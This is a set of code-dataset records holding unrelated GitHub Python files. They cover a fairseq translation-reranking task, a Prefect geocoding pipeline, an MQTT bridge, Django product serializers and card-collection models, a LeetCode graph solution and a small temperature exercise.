train, valid, test)\"},\n )\n seed: int = field(\n default=II(\"common.seed\"),\n metadata={\"help\": \"pseudo random number generator seed\"},\n )\n\n\nclass RerankerScorer(object):\n \"\"\"Scores the target for a given (source (optional), target) input.\"\"\"\n\n def __init__(self, args, mt_beam):\n self.mt_beam = mt_beam\n\n @torch.no_grad()\n def generate(self, models, sample, **kwargs):\n \"\"\"Score a batch of translations.\"\"\"\n net_input = sample[\"net_input\"]\n\n assert len(models) == 1, \"does not support model ensemble\"\n model = models[0]\n\n bs = net_input[\"src_tokens\"].shape[0]\n assert (\n model.joint_classification == \"none\" or bs % self.mt_beam == 0\n ), f\"invalid batch size ({bs}) for joint classification with beam size ({self.mt_beam})\"\n\n model.eval()\n logits = model(**net_input)\n\n batch_out = model.sentence_forward(logits, net_input[\"src_tokens\"])\n if model.joint_classification == \"sent\":\n batch_out = model.joint_forward(\n batch_out.view(self.mt_beam, bs // self.mt_beam, -1)\n )\n scores = model.classification_forward(\n batch_out.view(bs, 1, -1)\n ) # input: B x T x C\n\n return scores\n\n\n@register_task(\n \"discriminative_reranking_nmt\", dataclass=DiscriminativeRerankingNMTConfig\n)\nclass DiscriminativeRerankingNMTTask(FairseqTask):\n \"\"\"\n Translation rerank task.\n The input can be either (src, tgt) sentence pairs or tgt sentence only.\n \"\"\"\n\n cfg: DiscriminativeRerankingNMTConfig\n\n def __init__(self, cfg: DiscriminativeRerankingNMTConfig, data_dictionary=None):\n super().__init__(cfg)\n self.dictionary = data_dictionary\n self._max_positions = cfg.max_positions\n # args.tokens_per_sample = self._max_positions\n # self.num_classes = 1 # for model\n\n @classmethod\n def load_dictionary(cls, cfg, filename):\n \"\"\"Load the dictionary from the filename\"\"\"\n dictionary = Dictionary.load(filename)\n dictionary.add_symbol(\"\") # for loading pretrained XLMR model\n\n return dictionary\n\n @classmethod\n def setup_task(cls, cfg: DiscriminativeRerankingNMTConfig, **kwargs):\n # load data dictionary (assume joint dictionary)\n data_path = cfg.data\n data_dict = cls.load_dictionary(\n cfg, os.path.join(data_path, \"input_src/dict.txt\")\n )\n\n logger.info(\"[input] src dictionary: {} types\".format(len(data_dict)))\n\n return DiscriminativeRerankingNMTTask(cfg, data_dict)\n\n def load_dataset(self, split, epoch=0, combine=False, **kwargs):\n \"\"\"Load a given dataset split (e.g., train, valid, test).\"\"\"\n if self.cfg.data.endswith(\"1\"):\n data_shard = (epoch - 1) % self.cfg.num_data_splits + 1\n data_path = self.cfg.data[:-1] + str(data_shard)\n else:\n data_path = self.cfg.data\n\n def get_path(type, data_split):\n return os.path.join(data_path, str(type), data_split)\n\n def make_dataset(type, dictionary, data_split, combine):\n split_path = get_path(type, data_split)\n\n dataset = data_utils.load_indexed_dataset(\n split_path,\n dictionary,\n combine=combine,\n )\n return dataset\n\n def load_split(data_split, metric):\n input_src = None\n if self.cfg.include_src:\n input_src = make_dataset(\n \"input_src\", self.dictionary, data_split, combine=False\n )\n assert input_src is not None, \"could not find dataset: {}\".format(\n get_path(\"input_src\", data_split)\n )\n\n input_tgt = make_dataset(\n \"input_tgt\", self.dictionary, data_split, combine=False\n )\n assert input_tgt is not None, \"could not find dataset: {}\".format(\n get_path(\"input_tgt\", data_split)\n )\n\n label_path = f\"{get_path(metric, 
data_split)}.{metric}\"\n assert os.path.exists(label_path), f\"could not find dataset: {label_path}\"\n\n np_labels = np.loadtxt(label_path)\n if self.cfg.target_metric == \"ter\":\n np_labels = -np_labels\n label = RawLabelDataset(np_labels)\n\n return input_src, input_tgt, label\n\n src_datasets = []\n tgt_datasets = []\n label_datasets = []\n\n if split == self.cfg.train_subset:\n for k in itertools.count():\n split_k = \"train\" + (str(k) if k > 0 else \"\")\n prefix = os.path.join(data_path, \"input_tgt\", split_k)\n if not indexed_dataset.dataset_exists(prefix, impl=None):\n if k > 0:\n break\n else:\n raise FileNotFoundError(f\"Dataset not found: {prefix}\")\n input_src, input_tgt, label = load_split(\n split_k, self.cfg.target_metric\n )\n src_datasets.append(input_src)\n tgt_datasets.append(input_tgt)\n label_datasets.append(label)\n else:\n input_src, input_tgt, label = load_split(split, self.cfg.target_metric)\n src_datasets.append(input_src)\n tgt_datasets.append(input_tgt)\n label_datasets.append(label)\n\n if len(tgt_datasets) == 1:\n input_tgt, label = tgt_datasets[0], label_datasets[0]\n if self.cfg.include_src:\n input_src = src_datasets[0]\n else:\n input_tgt = ConcatDataset(tgt_datasets)\n label = ConcatDataset(label_datasets)\n if self.cfg.include_src:\n input_src = ConcatDataset(src_datasets)\n\n input_tgt = TruncateDataset(input_tgt, self.cfg.max_positions)\n if self.cfg.include_src:\n input_src = PrependTokenDataset(input_src, self.dictionary.bos())\n input_src = TruncateDataset(input_src, self.cfg.max_positions)\n src_lengths = NumelDataset(input_src, reduce=False)\n src_tokens = ConcatSentencesDataset(input_src, input_tgt)\n else:\n src_tokens = PrependTokenDataset(input_tgt, self.dictionary.bos())\n src_lengths = NumelDataset(src_tokens, reduce=False)\n\n dataset = {\n \"id\": IdDataset(),\n \"net_input\": {\n \"src_tokens\": RightPadDataset(\n src_tokens,\n pad_idx=self.source_dictionary.pad(),\n ),\n \"src_lengths\": src_lengths,\n },\n \"nsentences\": NumSamplesDataset(),\n \"ntokens\": NumelDataset(src_tokens, reduce=True),\n \"target\": label,\n }\n\n dataset = NestedDictionaryDataset(\n dataset,\n sizes=[src_tokens.sizes],\n )\n\n assert (\n len(dataset) % self.cfg.mt_beam == 0\n ), \"dataset size (%d) is not a multiple of beam size (%d)\" % (\n len(dataset),\n self.cfg.mt_beam,\n )\n\n # no need to shuffle valid/test sets\n if not self.cfg.no_shuffle and split == self.cfg.train_subset:\n\n # need to keep all hypotheses together\n start_idx = np.arange(0, len(dataset), self.cfg.mt_beam)\n with data_utils.numpy_seed(self.cfg.seed + epoch):\n np.random.shuffle(start_idx)\n\n idx = np.arange(0, self.cfg.mt_beam)\n shuffle = np.tile(idx, (len(start_idx), 1)).reshape(-1) + np.tile(\n start_idx, (self.cfg.mt_beam, 1)\n ).transpose().reshape(-1)
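\n # Worked example (illustrative, not in the original source): with\n # mt_beam=2 and 4 samples, start_idx is a permutation of [0, 2],\n # say [2, 0]; idx = [0, 1]; the tile/transpose above then gives\n # shuffle = [0, 1, 0, 1] + [2, 2, 0, 0] = [2, 3, 0, 1],\n # i.e. each beam's hypotheses stay adjacent after shuffling.\n\n dataset = SortDataset(\n dataset,\n sort_order=[shuffle],\n )\n\n logger.info(f\"Loaded {split} with #samples: {len(dataset)}\")\n\n self.datasets[split] = dataset\n return self.datasets[split]\n\n def build_dataset_for_inference(self, src_tokens, src_lengths, **kwargs):\n assert not self.cfg.include_src or len(src_tokens[0]) == 2\n input_src = None\n if self.cfg.include_src:\n input_src = TokenBlockDataset(\n [t[0] for t in src_tokens],\n [l[0] for l in src_lengths],\n block_size=None, # ignored for \"eos\" break mode\n pad=self.source_dictionary.pad(),\n eos=self.source_dictionary.eos(),\n break_mode=\"eos\",\n )\n input_src = PrependTokenDataset(input_src, self.dictionary.bos())\n input_src = 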
TruncateDataset(input_src, self.cfg.max_positions)\n\n input_tgt = TokenBlockDataset(\n [t[-1] for t in src_tokens],\n [l[-1] for l in src_lengths],\n block_size=None, # ignored for \"eos\" break mode\n pad=self.source_dictionary.pad(),\n eos=self.source_dictionary.eos(),\n break_mode=\"eos\",\n )\n input_tgt = TruncateDataset(input_tgt, self.cfg.max_positions)\n if self.cfg.include_src:\n src_tokens = ConcatSentencesDataset(input_src, input_tgt)\n src_lengths = NumelDataset(input_src, reduce=False)\n else:\n input_tgt = PrependTokenDataset(input_tgt, self.dictionary.bos())\n src_tokens = input_tgt\n src_lengths = NumelDataset(src_tokens, reduce=False)\n\n dataset = {\n \"id\": IdDataset(),\n \"net_input\": {\n \"src_tokens\": RightPadDataset(\n src_tokens,\n pad_idx=self.source_dictionary.pad(),\n ),\n \"src_lengths\": src_lengths,\n },\n \"nsentences\": NumSamplesDataset(),\n \"ntokens\": NumelDataset(src_tokens, reduce=True),\n }\n\n return NestedDictionaryDataset(\n dataset,\n sizes=[src_tokens.sizes],\n )\n\n def build_model(self, cfg: FairseqDataclass, from_checkpoint: bool = False):\n return super().build_model(cfg)\n\n def build_generator(self, args):\n return RerankerScorer(args, mt_beam=self.cfg.mt_beam)\n\n def max_positions(self):\n return self._max_positions\n\n @property\n def source_dictionary(self):\n return self.dictionary\n\n @property\n def target_dictionary(self):\n return self.dictionary\n\n def create_dummy_batch(self, device):\n dummy_target = (\n torch.zeros(self.cfg.mt_beam, EVAL_BLEU_ORDER * 2 + 3).long().to(device)\n if self.cfg.target_metric != \"ter\"\n else torch.zeros(self.cfg.mt_beam, 3).long().to(device)\n )\n\n return {\n \"id\": torch.zeros(self.cfg.mt_beam, 1).long().to(device),\n \"net_input\": {\n \"src_tokens\": torch.zeros(self.cfg.mt_beam, 4).long().to(device),\n \"src_lengths\": torch.ones(self.cfg.mt_beam, 1).long().to(device),\n },\n \"nsentences\": 0,\n \"ntokens\": 0,\n \"target\": dummy_target,\n }\n\n def train_step(\n self, sample, model, criterion, optimizer, update_num, ignore_grad=False\n ):\n if ignore_grad and sample is None:\n sample = self.create_dummy_batch(model.device)\n\n return super().train_step(\n sample, model, criterion, optimizer, update_num, ignore_grad\n )\n\n def valid_step(self, sample, model, criterion):\n if sample is None:\n sample = self.create_dummy_batch(model.device)\n\n loss, sample_size, logging_output = super().valid_step(sample, model, criterion)\n\n if not self.cfg.eval_target_metric:\n return loss, sample_size, logging_output\n\n scores = logging_output[\"scores\"]\n\n if self.cfg.target_metric == \"bleu\":\n assert sample[\"target\"].shape[1] == EVAL_BLEU_ORDER * 2 + 3, (\n \"target does not contain enough information (\"\n + str(sample[\"target\"].shape[1])\n + \"for evaluating BLEU\"\n )\n\n max_id = 
torch.argmax(scores, dim=1)\n select_id = max_id + torch.arange(\n 0, sample_size * self.cfg.mt_beam, self.cfg.mt_beam\n ).to(max_id.device)\n ter_data = sample[\"target\"][select_id, 1:].sum(0).data\n\n logging_output[\"_ter_num_edits\"] = -ter_data[0]\n logging_output[\"_ter_ref_len\"] = -ter_data[1]\n\n return loss, sample_size, logging_output\n\n def reduce_metrics(self, logging_outputs, criterion):\n super().reduce_metrics(logging_outputs, criterion)\n\n if not self.cfg.eval_target_metric:\n return\n\n def sum_logs(key):\n return sum(log.get(key, 0) for log in logging_outputs)\n\n if self.cfg.target_metric == \"bleu\":\n counts, totals = [], []\n for i in range(EVAL_BLEU_ORDER):\n counts.append(sum_logs(\"_bleu_counts_\" + str(i)))\n totals.append(sum_logs(\"_bleu_totals_\" + str(i)))\n\n if max(totals) > 0:\n # log counts as numpy arrays -- log_scalar will sum them correctly\n metrics.log_scalar(\"_bleu_counts\", np.array(counts))\n metrics.log_scalar(\"_bleu_totals\", np.array(totals))\n metrics.log_scalar(\"_bleu_sys_len\", sum_logs(\"_bleu_sys_len\"))\n metrics.log_scalar(\"_bleu_ref_len\", sum_logs(\"_bleu_ref_len\"))\n\n def compute_bleu(meters):\n import inspect\n import sacrebleu\n\n fn_sig = inspect.getfullargspec(sacrebleu.compute_bleu)[0]\n if \"smooth_method\" in fn_sig:\n smooth = {\"smooth_method\": \"exp\"}\n else:\n smooth = {\"smooth\": \"exp\"}\n bleu = sacrebleu.compute_bleu(\n correct=meters[\"_bleu_counts\"].sum,\n total=meters[\"_bleu_totals\"].sum,\n sys_len=meters[\"_bleu_sys_len\"].sum,\n ref_len=meters[\"_bleu_ref_len\"].sum,\n **smooth,\n )\n return round(bleu.score, 2)\n\n metrics.log_derived(\"bleu\", compute_bleu)\n elif self.cfg.target_metric == \"ter\":\n num_edits = sum_logs(\"_ter_num_edits\")\n ref_len = sum_logs(\"_ter_ref_len\")\n\n if ref_len > 0:\n metrics.log_scalar(\"_ter_num_edits\", num_edits)\n metrics.log_scalar(\"_ter_ref_len\", ref_len)\n\n def compute_ter(meters):\n score = meters[\"_ter_num_edits\"].sum / meters[\"_ter_ref_len\"].sum\n return round(score.item(), 2)\n\n metrics.log_derived(\"ter\", compute_ter)\n","repo_name":"facebookresearch/fairseq","sub_path":"examples/discriminative_reranking_nmt/tasks/discriminative_reranking_task.py","file_name":"discriminative_reranking_task.py","file_ext":"py","file_size_in_byte":17561,"program_lang":"python","lang":"en","doc_type":"code","stars":28050,"dataset":"github-code","pt":"62"} +{"seq_id":"23219379449","text":"from math import inf\n\"\"\"maior = -321\nmenor = 321\"\"\"\nb = '='*35\nmaior = -inf\nmenor = inf\nctemp = 0\nsomat = 0\ntem = 'S'\nwhile tem == 'S':\n temp = float(input('Qual foi a temperatura registrada ? '))\n if temp > maior:\n maior=temp\n if temp < menor:\n menor = temp\n tem = str(input('Deseja mais incluir uma temperatura ? 
(utilize S para sim)')).upper()\n somat += temp\n ctemp +=1\nprint (f'{b}\\nForam Registradas {ctemp} temperaturas\\nA maior temperatura registrada foi {maior}ºC\\nA menor temperatura registrada foi {menor} ºC\\nA média Final das temperaturas foi de : {somat/ctemp:.2f} ºC\\n{b}')\n","repo_name":"Davisnts/AulasDeADS","sub_path":"Exercicios02/Ex010.py","file_name":"Ex010.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74277279557","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTasks for georeferencing tables\n\"\"\"\n\nfrom pathlib import Path\nfrom time import time\nfrom typing import List, Tuple\nfrom uuid import uuid4\n\nimport basedosdados as bd\nfrom geopy.extra.rate_limiter import RateLimiter\nfrom geopy.geocoders import Nominatim\nfrom geopy.location import Location\nimport pandas as pd\nfrom prefect import task\n\nfrom pipelines.utils.georeference.utils import check_if_belongs_to_rio\nfrom pipelines.utils.utils import log\n\n\n@task\ndef validate_georeference_mode(mode: str) -> None:\n \"\"\"\n Validates georeference mode\n \"\"\"\n if mode not in [\n \"distinct\",\n # insert new modes here\n ]:\n raise ValueError(\n f\"Invalid georeference mode: {mode}. Valid modes are: distinct\"\n )\n\n\n@task(nout=2)\ndef get_new_addresses( # pylint: disable=too-many-arguments, too-many-locals\n source_dataset_id: str,\n source_table_id: str,\n source_table_address_column: str,\n destination_dataset_id: str,\n destination_table_id: str,\n georef_mode: str,\n current_flow_labels: List[str],\n) -> Tuple[pd.DataFrame, bool]:\n \"\"\"\n Get new addresses from source table\n \"\"\"\n\n new_addresses = pd.DataFrame(columns=[\"address\"])\n exists_new_addresses = False\n\n source_table_ref = f\"{source_dataset_id}.{source_table_id}\"\n destination_table_ref = f\"{destination_dataset_id}.{destination_table_id}\"\n billing_project_id = current_flow_labels[0]\n\n if georef_mode == \"distinct\":\n query_source = f\"\"\"\n SELECT DISTINCT\n {source_table_address_column}\n FROM\n `{source_table_ref}`\n \"\"\"\n\n query_destination = f\"\"\"\n SELECT DISTINCT\n address\n FROM\n `{destination_table_ref}`\n \"\"\"\n\n source_addresses = bd.read_sql(\n query_source, billing_project_id=billing_project_id, from_file=True\n )\n source_addresses.columns = [\"address\"]\n try:\n destination_addresses = bd.read_sql(\n query_destination, billing_project_id=billing_project_id, from_file=True\n )\n destination_addresses.columns = [\"address\"]\n except Exception: # pylint: disable=broad-except\n destination_addresses = pd.DataFrame(columns=[\"address\"])\n\n # pylint: disable=invalid-unary-operand-type\n new_addresses = source_addresses[\n ~source_addresses.isin(destination_addresses)\n ].dropna()\n exists_new_addresses = not new_addresses.empty\n\n return new_addresses, exists_new_addresses\n\n\n@task\ndef georeference_dataframe(\n new_addresses: pd.DataFrame, log_divider: int = 60\n) -> pd.DataFrame:\n \"\"\"\n Georeference all addresses in a dataframe\n \"\"\"\n start_time = time()\n\n all_addresses = new_addresses[\"address\"].tolist()\n all_addresses = [f\"{address}, Rio de Janeiro\" for address in all_addresses]\n\n geolocator = Nominatim(user_agent=\"prefeitura-rio\")\n geocode = RateLimiter(geolocator.geocode, min_delay_seconds=1)\n\n log(f\"There are {len(all_addresses)} addresses to georeference\")\n\n locations: List[Location] = []\n for i, address in enumerate(all_addresses):\n if i % log_divider == 0:\n 
log(f\"Georeferencing address {i} of {len(all_addresses)}...\")\n location = geocode(address)\n locations.append(location)\n\n geolocated_addresses = [\n {\n \"latitude\": location.latitude,\n \"longitude\": location.longitude,\n }\n if location is not None\n else {\"latitude\": None, \"longitude\": None}\n for location in locations\n ]\n\n output = pd.DataFrame(geolocated_addresses)\n output[\"address\"] = new_addresses[\"address\"]\n output[[\"latitude\", \"longitude\"]] = output.apply(\n lambda x: check_if_belongs_to_rio(x.latitude, x.longitude),\n axis=1,\n result_type=\"expand\",\n )\n\n log(f\"--- {(time() - start_time)} seconds ---\")\n\n return output\n\n\n@task\ndef dataframe_to_csv(dataframe: pd.DataFrame, filename: str = \"data.csv\") -> None:\n \"\"\"\n Save dataframe to csv\n \"\"\"\n filename = filename if filename.endswith(\".csv\") else f\"{filename}.csv\"\n temp_filename = Path(f\"/tmp/{uuid4()}/{filename}\")\n temp_filename.parent.mkdir(parents=True, exist_ok=True)\n dataframe.to_csv(temp_filename, index=False)\n return str(temp_filename.parent)\n","repo_name":"prefeitura-rio/pipelines","sub_path":"pipelines/utils/georeference/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"62"} {"seq_id":"19626053328","text":"import time\nimport logging\nimport paho.mqtt.client as mqtt\nimport traceback\nimport json\n\nimport sys\nfrom os import getenv, environ\n\nlogging.basicConfig(filename='recv_client.log', level=logging.INFO, filemode='w')\n\n\ndef connect(client_name, broker_address, port=1883):\n mqttc = mqtt.Client(client_name, True)\n mqttc.on_connect = on_connect # attach function to callback\n mqttc.on_message = on_message # attach function to callback\n mqttc.connect(broker_address, port) # connect to broker\n mqttc.loop_start() # start loop to process callback\n time.sleep(4) # wait for connection setup to complete\n\n return mqttc\n\n\ndef on_connect(client, userdata, flags, rc):\n \"\"\"\n The callback for when the client receives a CONNACK response from the server.\n \"\"\"\n if rc == 0:\n client.subscribe(topic_subscribe)\n print(\"connected OK with returned code=\", rc)\n else:\n print(\"Bad connection with returned code=\", rc)\n\ndef on_message(client, userdata, msg):\n \"\"\"\n The callback for when a PUBLISH message is received from the server\n \"\"\"\n\n message = json.loads(msg.payload)\n print(\"---------------------------------------------------------------\")\n readings = message['readings']\n readings['ts'] = json.loads(\"\".join(readings[\"ts\"].split(\"\\\\\")))\n readings['data'] = json.loads(readings[\"data\"])\n readings = [readings]\n print(readings)\n\n if readings:\n try:\n sogno_msg = json.dumps(readings)\n #mqttc_sogno.connect(broker_address_rabbitmq, port_rabbitmq)\n mqttc_sogno.publish(topic_publish, sogno_msg, 0)\n\n # Finished message\n print(\"Finished sending message\")\n\n except Exception as e:\n print(e)\n traceback.print_tb(e.__traceback__)\n sys.exit()\n\nif len(sys.argv) != 4:\n print(\"Specify three arguments\")\n sys.exit()\n\nclient_name = \"sogno_fledge_adapter\"\ntopic_subscribe = sys.argv[1]\ntopic_publish = \"/dpsim-powerflow\"\n\n# Local SOGNO platform broker\nbroker_address_rabbitmq = getenv('MQTT_RABBITMQ_BROKER', 'localhost')\nport_rabbitmq = int(getenv('MQTT_RABBITMQ_PORT','1883'))\n\n# Local Fledge platform broker\nbroker_address_emqx = sys.argv[2]\nport_emqx = int(sys.argv[3])
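\n\n# Illustrative invocation (topic, broker, and port are example values):\n# python3 fledge-plugin.py fledge/readings localhost 1883\nmqttc_sogno = 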
mqtt.Client()\nif 'MQTT_RABBITMQ_USER' in environ:\n mqttc_sogno.username_pw_set(getenv('MQTT_RABBITMQ_USER'), getenv('MQTT_RABBITMQ_PWD'))\nmqttc_sogno.connect(broker_address_rabbitmq, port_rabbitmq)\nmqttc_sogno.loop_start()\n\nmqttc_fledge = connect(client_name, broker_address_emqx, port_emqx)\n\nprint(\"Press CTRL+C to stop client...\")\n\nmqttc_fledge.publish(\"/debug\", \"SE started\")\n\ntry:\n while 1:\n time.sleep(1)\n # ensure debug ouput gets flushed\n sys.stdout.flush()\n\nexcept KeyboardInterrupt:\n print('Exiting...')\n mqttc_fledge.loop_stop()\n mqttc_fledge.disconnect()\n mqttc_sogno.loop_stop()\n mqttc_sogno.disconnect()\n sys.exit(0)\n","repo_name":"EdgeGallery/plugins","sub_path":"sogno/fledge-sogno-adapter/fledge-plugin.py","file_name":"fledge-plugin.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"62"} +{"seq_id":"17807357780","text":"from rest_framework import serializers\n\nfrom products.models import Product, ProductImage\n\n\nclass ProductImageSerializer(serializers.ModelSerializer):\n \"\"\"serializes a product image model obj\"\"\"\n image_url = serializers.SerializerMethodField(read_only=True)\n image = serializers.ImageField(required=False, write_only=True)\n\n class Meta:\n model = ProductImage\n fields = (\"id\", \"image_url\", \"image\", \"image_code\")\n read_only_fields = (\"id\",)\n\n def get_image_url(self, instance):\n \"\"\"returns absolute url of image\"\"\"\n request = self.context.get(\"request\")\n if hasattr(instance, \"image\"):\n image_url = instance.image.url\n return request.build_absolute_uri(image_url)\n return None\n\n def create(self, validated_data):\n \"\"\"creates a new image details obj in DB\"\"\"\n image_code = validated_data[\"image_code\"]\n if image_code:\n image = ProductImage.objects.filter(image_code=image_code).first()\n if image:\n error = {\n \"message\": f\"Product with code ({image_code}) exists\"\n }\n raise serializers.ValidationError(error, code=\"validation\")\n\n request = self.context.get(\"request\")\n if request and hasattr(request, \"user\"):\n request_user = request.user\n validated_data.pop(\"request_user\")\n else:\n request_user = validated_data.pop(\"request_user\")\n\n validated_data[\"created_by\"] = request_user.id\n validated_data[\"updated_by\"] = request_user.id\n product_image = ProductImage.objects.create(**validated_data)\n if len(product_image.image_code) == 0:\n product = validated_data[\"product\"]\n product_image.image_code = f\"{product.product_code}-{product_image.id}\"\n product_image.save()\n return product_image\n\n def update(self, instance, validated_data):\n \"\"\"updates a product image instance in db with validated data\"\"\"\n image_code = validated_data[\"image_code\"]\n if image_code:\n image = ProductImage.objects.filter(image_code=image_code).first()\n if image:\n error = {\n \"message\": f\"Product with code ({image_code}) exists\"\n }\n raise serializers.ValidationError(error, code=\"validation\")\n\n request = self.context.get(\"request\")\n if request and hasattr(request, \"user\"):\n request_user = request.user\n validated_data.pop(\"request_user\")\n else:\n request_user = validated_data.pop(\"request_user\")\n\n instance.product = validated_data.get(\"product_id\", instance.product)\n instance.image = validated_data.get(\"image\", instance.image)\n instance.image_code = validated_data.get(\"image_code\", instance.image_code)\n instance.is_main_image = 
validated_data.get(\"is_main_image\", instance.is_main_image)\n instance.updated_on = validated_data[\"updated_on\"]\n instance.updated_by = request_user.id\n instance.save()\n return instance\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n \"\"\"serializes product objects\"\"\"\n created_on = serializers.DateTimeField(required=False)\n updated_on = serializers.DateTimeField(required=False)\n\n class Meta:\n model = Product\n fields = (\n \"id\", \"name\", \"product_code\", \"price\", \"cost\", \"is_service\", \"created_on\", \"updated_on\",\n \"created_by\", \"updated_by\", \"is_deleted\", \"is_available\", \"units_available\", \"category\"\n )\n read_only_fields = (\"id\", \"created_by\", \"updated_by\")\n\n def create(self, validated_data):\n \"\"\"creates a new product with validated data\"\"\"\n request = self.context.get(\"request\")\n if request and hasattr(request, \"user\"):\n request_user = request.user\n else:\n request_user = validated_data.pop(\"request_user\")\n\n validated_data[\"created_by\"] = request_user.id\n validated_data[\"updated_by\"] = request_user.id\n validated_data[\"is_available\"] = True\n product = Product.objects.create(**validated_data)\n return product\n\n def update(self, instance, validated_data):\n \"\"\"updates a product obj\"\"\"\n request = self.context.get(\"request\")\n if request and hasattr(request, \"user\"):\n request_user = request.user\n else:\n request_user = validated_data.pop(\"request_user\")\n instance.name = validated_data.get(\"name\", instance.name)\n instance.price = validated_data.get(\"price\", instance.price)\n instance.cost = validated_data.get(\"cost\", instance.cost)\n instance.product_code = validated_data.get(\"product_code\", instance.product_code)\n instance.is_service = validated_data.get(\"is_service\", instance.is_service)\n instance.updated_on = validated_data.get(\"updated_on\", instance.updated_on)\n instance.is_deleted = validated_data.get(\"is_deleted\", instance.is_deleted)\n instance.is_available = validated_data.get(\"is_available\", instance.is_available)\n instance.category = validated_data.get(\"category\", instance.category)\n instance.units_available = validated_data.get(\"units_available\", instance.units_available)\n\n instance.updated_by = request_user.id\n instance.save()\n return instance\n","repo_name":"venky-web/tailors-rest-api","sub_path":"products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"16147606907","text":"#\n# @lc app=leetcode id=261 lang=python3\n#\n# [261] Graph Valid Tree\n#\n\n# @lc code=start\nimport collections\nclass Solution:\n def validTree(self, n: int, edges):\n if len(edges) != n - 1:\n return False\n neighbors = collections.defaultdict(list)\n for item in edges:\n neighbors[item[0]].append(item[1])\n neighbors[item[1]].append(item[0])\n visited = set()\n q = collections.deque([0])\n while q:\n curele = q.popleft()\n visited.add(curele)\n for node in neighbors[curele]:\n if node not in visited:\n visited.add(node)\n q.append(node)\n return len(visited) == n\n\nif __name__ == '__main__':\n a = Solution()\n b = a.validTree(5, [[0,1],[1,2],[2,3],[1,3],[1,4]])\n print(b)
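\n# Note (added for clarity): a graph is a valid tree iff it has exactly\n# n - 1 edges and is connected; the early length check plus the BFS\n# reachability count above verify exactly those two properties.\n# The sample input has 5 edges for n=5, so this prints False.\n\n# @lc 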
code=end\n\n","repo_name":"610yilingliu/leetcode","sub_path":"Python3/261.graph-valid-tree.py","file_name":"261.graph-valid-tree.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"31203943091","text":"from django.db import models\nfrom django.urls import reverse\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\n\ndef validate_positive(value):\n if value < 0:\n raise ValidationError(\n _('%(value)s is not a positive number'),\n params={'value': value},\n )\n\n\nclass MTGSet(models.Model):\n # primary_key\n expansion_code = models.CharField(\n max_length = 3,\n primary_key=True\n )\n\n set_name = models.CharField(\n max_length = 20,\n )\n\n set_size = models.PositiveIntegerField()\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return self.set_name\n\n\nclass MTGCard(models.Model):\n\n CARD_TYPE_CHOICES = (\n ('Artifact', 'Artifact'),\n ('Creature', 'Creature'),\n ('Enchantment', 'Enchantment'),\n ('Instant', 'Instant'),\n ('Land', 'Land'),\n ('Legendary', 'Legendary'),\n ('Planeswalker', 'Planeswalker'),\n ('Sorcery', 'Sorcery'),\n )\n\n COLOR_CHOICES = (\n ('W', 'White'),\n ('U', 'Blue'),\n ('B', 'Black'),\n ('R', 'Red'),\n ('G', 'Green'),\n )\n\n RARITY_CHOICES = (\n ('B', 'Basic'),\n ('C', 'Common'),\n ('U', 'Uncommon'),\n ('R', 'Rare'),\n ('M', 'Mythic Rare')\n )\n\n\n # First 3: set expansion code, last 3: card number\n SKU_ID = models.CharField(\n max_length = 6,\n primary_key=True\n )\n\n card_name = models.CharField(\n max_length = 30,\n )\n\n set = models.ForeignKey(\n 'MTGSet',\n on_delete=models.SET_NULL,\n null=True)\n\n number = models.PositiveIntegerField()\n\n rarity = models.CharField(\n max_length = 1,\n choices = RARITY_CHOICES,\n )\n\n color = models.CharField(\n max_length = 1,\n choices = COLOR_CHOICES,\n )\n\n card_type = models.CharField(\n max_length = 12,\n choices = CARD_TYPE_CHOICES,\n )\n\n card_subtype = models.CharField(\n max_length = 20,\n blank = True,\n )\n\n converted_cost = models.PositiveIntegerField()\n\n rule_text = models.TextField(\n max_length = 400,\n blank = True,\n )\n\n image = models.CharField(\n max_length = 100,\n blank = True,)\n\n class Meta:\n ordering = ['card_name']\n\n def __str__(self):\n \"\"\"String for representing the Model object.\"\"\"\n return self.card_name\n\n def get_absolute_url(self):\n \"\"\"Returns the url to access a detail record for this book.\"\"\"\n return reverse('mtgcard-detail', args=[str(self.pk)])\n\n\nclass MTGSingle(models.Model):\n\n CONDITION_CHOICES = (\n ('NM', 'Near Mint'),\n ('LP', 'Lightly Played'),\n ('MP', 'Moderately Played'),\n ('HP', 'Heavily Played'),\n ('DM', 'Damaged'),\n )\n\n LANGUAGE_CHOICE = (\n ('EN', 'English'),\n ('SP', 'Spanish'),\n ('FR', 'French'),\n ('DE', 'German'),\n ('IT', 'Italian'),\n ('PT', 'Portuguese'),\n ('JP', 'Japanese'),\n ('KR', 'Korean'),\n ('RU', 'Russian'),\n ('CS', 'Simplified Chinese'),\n ('CT', 'Traditional Chinese'),\n )\n\n SKU_ID = models.ForeignKey(\n 'MTGCard',\n on_delete=models.SET_NULL,\n null=True)\n\n condition = models.CharField(\n max_length = 2,\n choices = CONDITION_CHOICES,\n )\n\n language = models.CharField(\n max_length = 2,\n choices = LANGUAGE_CHOICE,\n )\n\n qty = models.IntegerField(\n default = 0,\n )\n\n price = models.DecimalField(\n max_digits=5,\n decimal_places=2,\n validators=[validate_positive],\n )\n\n class Meta:\n unique_together = 
